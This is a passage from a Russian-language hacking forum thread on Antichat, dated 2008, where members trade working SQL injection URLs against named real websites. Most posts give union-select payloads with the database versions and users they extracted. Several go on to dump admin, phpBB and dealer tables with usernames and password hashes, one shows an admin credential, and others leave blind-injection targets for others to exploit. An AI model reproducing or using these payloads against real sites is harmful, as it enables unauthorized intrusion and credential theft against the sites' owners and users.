ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5401  
Старый 03.05.2008, 00:23
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.ufsa-tour.com.ua/news.php?news_id=-17+union+select+1,2,3,concat_ws(char(58),version() ,user(),database()),5,6/*

4.1.22-standard-log
ufsacom_usrufsa3@localhost
ufsacom_ufsa3


//*************************************
Страховая компания ВЕСКО
http://vesko.com.ua/news.php?news_ID=-328+union+select+1,2,user(),4,5,version()/*

4.1.22-log
news@hosting02.iptelecom.net.ua
news


//*************************************
http://www.bumexpress.com.ua/news.php?news_id=-122+union+select+1,2,user(),4,5,6,7,8,9,10,11/*

4.1.22
bumexpress@localhost
bumexpress


//************************************
http://kompan.altercon.com.ua/news.php?news=2&news_id=-3+union+select+1,user(),3,4,version(),6,database() ,8/*

4.1.22-log
altercon_det@viper
altercon_det


//************************************
Отель "РУСЬ" Киев
http://www.hotelrus.kiev.ua/ru/information/news/news.php?news_id=-2+union+select+1,user(),3,version(),5,6,7/*

5.0.22-standard
droopy_hotelrus@localhost
droopy_hotelrus



Блин в 12.00 вырубят инет
кому надо держите
http://www.master-stroy-yug.com.ua/news.php?news_id=22+order+by+1/*

http://www.cpc.com.ua/rus/news.php?news_id=11+order+by+100/*
не серчайте на меня за офтоп плиз

Славная сегодня была охота

Последний раз редактировалось neon_fx; 03.05.2008 в 01:01..
 
Ответить с цитированием

  #5402  
Старый 03.05.2008, 02:28
Nekt
Познающий
Регистрация: 31.08.2006
Сообщений: 67
Провел на форуме:
377085

Репутация: 18
По умолчанию

http://www.master-stroy-yug.com.ua/news.php?news_id=22+union+select+1,user(),version( ),4,5,6/*
админка тоже есть, но она походу пишет и взаимодействует с файлами а не базой..
5 ветка.

http://encycl.anthropology.ru/article.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8,9,10/*
5 ветка

http://www.mtas.ru/second.php?ID=-15+union+select+AES_DECRYPT(AES_ENCRYPT(version(), 0x71),0x71)/*
5 ветка

http://www.ciritas.ru/product.php?id=-2+union+select+1,2,3,4,version(),6,7,8,9/*
fадминка по ходу дело с базой повязана
4 ветка

http://www.clasp.org/publications.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15/*
первая версия 4 ветки кажись, дальше крутить охоты нету..

http://www.fondationbrigittebardot.fr/site/homepage.php?Id=2+union+select+1/*
фильтрация
http://www.gregorypacks.com/prod.php?ID=-2+order+select+1/*
здесь полная фильтрация.. Жесть

http://www.eutrainingsite.com/open_details.php?id=2+group+by+55/*
не столько терпелив.. Думаю кому-нить пригодиться .

Последний раз редактировалось Nekt; 03.05.2008 в 03:39..
 
Ответить с цитированием

  #5403  
Старый 03.05.2008, 11:05
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
Smile

Извиняюсь за оффтоП, но
Цитата:
mtas.ru
encycl.anthropology.ru
ciritas.ru
clasp.org
fondationbrigittebardot.fr
gregorypacks.com
eutrainingsite.com
Баян. Юзайте поиск.
 
Ответить с цитированием

  #5404  
Старый 03.05.2008, 15:14
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

Мелочевка.

hadouken!
Цитата:
http://www.hadouken.co.uk/category.php?categoryID=-1+union+select+1,2,concat(user(),0x2,database(),0x 2,version()),4,5,6,7--
user: uk_hadoukenUser@unity-apache2
db: uk_hadouken
version: 4.0.14-Max-log

panelmonkey.org
Цитата:
http://www.panelmonkey.org/background.php?id=-7+union+select+1,concat(user(),0x2,database(),0x3, version()),3,4,5,6,7--
user: dbo113074304@74.208.16.39
db: db113074304
version: 4.0.27-max-log

bitdefenderthailand.com
Цитата:
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,unhex(hex(concat(user(),0x2,da tabase(),0x2,version()))),4,5,6,7,8,9,10--
user: amphonet_priy@localhost
db: amphonet_bitdefender
version: 5.0.22

Код:
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(TABLE_NAME,0x2,COLUMN_NAME))),6,7,8,9,10+from+INFORMATION_SCHEMA.COLUMNS+where+COLUMN_NAME+like+'login'--
Код:
http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id,0x2,company_name,0x2,address,0x2,company_phone,0x2,contact_person,0x2,password))),6,7,8,9,10+from+dealer--
 
Ответить с цитированием

  #5405  
Старый 03.05.2008, 17:30
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Веломаг

Код:
http://veliki.ru/shop/show_cat.php?grid=-10%20union%20select%201,2,3,version(),5,6/*
Код:
http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,passwd),5,6/**/from/**/user/*

Код:
http://veliki.ru/shop/show_cat.php?grid=-10/**/union/**/select/**/1,2,3,concat_ws(0x3a,username,password),5,6/**/from/**/admin/*
ну а вот и админ

Цитата:
veliki:5d0c553853953d3b
 
Ответить с цитированием

sql
  #5406  
Старый 03.05.2008, 22:27
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

autolider.info
Цитата:
http://www.autolider.info/news/main.php?id=203&cpage=1&id_rub=-4+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,us ername,user_password,user_email,user_level),7,8,9, 0,1,2+from+phpbb_users+where+user_level=1/*
--

Цитата:
http://china-trex.ru/index.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,concat_ws(0x203a20,id,name,psw,access,email,nic ),0,1,2,3,4,5+from+admins+limit+1,1/*

Последний раз редактировалось Серенький; 03.05.2008 в 23:13..
 
Ответить с цитированием

  #5407  
Старый 04.05.2008, 01:22
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

Цитата:
http://www.cedarcityreview.com/articles.php?id=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10,11,12,13,14/*
VERSION: 5.1.22-rc
USER: cedarv_user@localhost
DATABASE: cedarv_omnibus
 
Ответить с цитированием

  #5408  
Старый 04.05.2008, 18:26
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606

Репутация: 105
Отправить сообщение для Fuckel с помощью ICQ
По умолчанию

2 Nekt
Боян, ниче там не фильтруется и не жесть никакая, читай мануалы
http://www.gregorypacks.com/prod.php?ID=-1+union+select+1,2,3,concat_ws(0x3C62723E,DATABASE (),VERSION(),USER()),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52+--+
 
Ответить с цитированием

  #5409  
Старый 04.05.2008, 21:54
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Что скажете насчет этого -
http://sexnos.ru/registration.php

В форме ввода пароля, если ввести "> то выдает ошибку что то с датой связонное с запросом..

пробовал запросы состовлять -но ничего путного не вышло... Можно как то расковырять?
 
Ответить с цитированием

  #5410  
Старый 04.05.2008, 22:05
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.suncity.kiev.ua/index.php?id=90+and+lower(substring(version(),1,1) )=4&lang=en

Слепая четвертой версии, кто хотит раскручивайте)))
==============================================

http://www.balaklawa.com/static.php?code=-1+union+select+1,version(),3--&lng=en

5 версия, лажа, ничего интересного в таблицах
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ